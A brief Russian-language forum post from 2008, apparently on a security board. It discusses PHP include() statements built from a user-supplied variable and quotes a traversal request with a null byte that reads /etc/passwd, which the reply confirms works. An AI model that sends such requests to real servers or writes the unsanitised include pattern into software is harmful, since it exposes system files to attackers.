
18.07.2008, 16:44
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Сообщение от .Slip
include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");
И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd?
Если не ошибаюсь, то в твоем примере в обоих случаях выведет /etc/passwd ))
|
|
|